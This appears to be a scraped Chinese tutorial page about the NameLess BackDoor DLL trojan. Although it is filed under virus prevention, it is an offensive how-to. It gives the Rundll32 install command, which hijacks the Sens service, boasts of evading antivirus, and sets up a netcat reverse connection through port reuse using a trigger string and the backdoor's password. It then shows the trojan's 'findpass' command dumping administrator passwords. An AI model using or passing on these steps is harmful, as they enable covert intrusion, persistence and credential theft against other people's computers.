我要投稿
  • 您当前的位置:365bet官方 -> 技术教程 -> 病毒防治教程 -> 教程内容
  • [ 收藏本页教程 ]
  • 气疯安全工具—新兴DLL型木马复仇记

    教程作者:佚名    教程来源:不详   教程栏目:病毒防治教程    收藏本页

      NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。

      说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。

      NameLess BackDoor实战演练

      将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。

      一、随风潜入夜——安装

      下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。

      怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!

      在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):

      Rundll32 NameLess.dll,Install

      执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。

      小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。

      二、穿墙细无声——连接

      安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
     
      小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。

      我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:

      nc
      -l -p 12345

      命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):

      nc 192.168.1.11 139

      建立连接后输入如下内容(如图3):

      dargun|192.168.1.11:12345

      其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)

      三、为我所欲为——控制

      成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess

      BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。

      1.巧盗管理员密码

      连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!

      在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的!

     

    我要投稿   -   广告合作   -   关于本站   -   友情连接   -   网站地图   -   联系我们   -   版权声明   -   设为首页   -   加入收藏   -   网站留言
    Copyright © 2009 - 20012 www.www.ct131.com All Rights Reserved.365bet官方 版权所有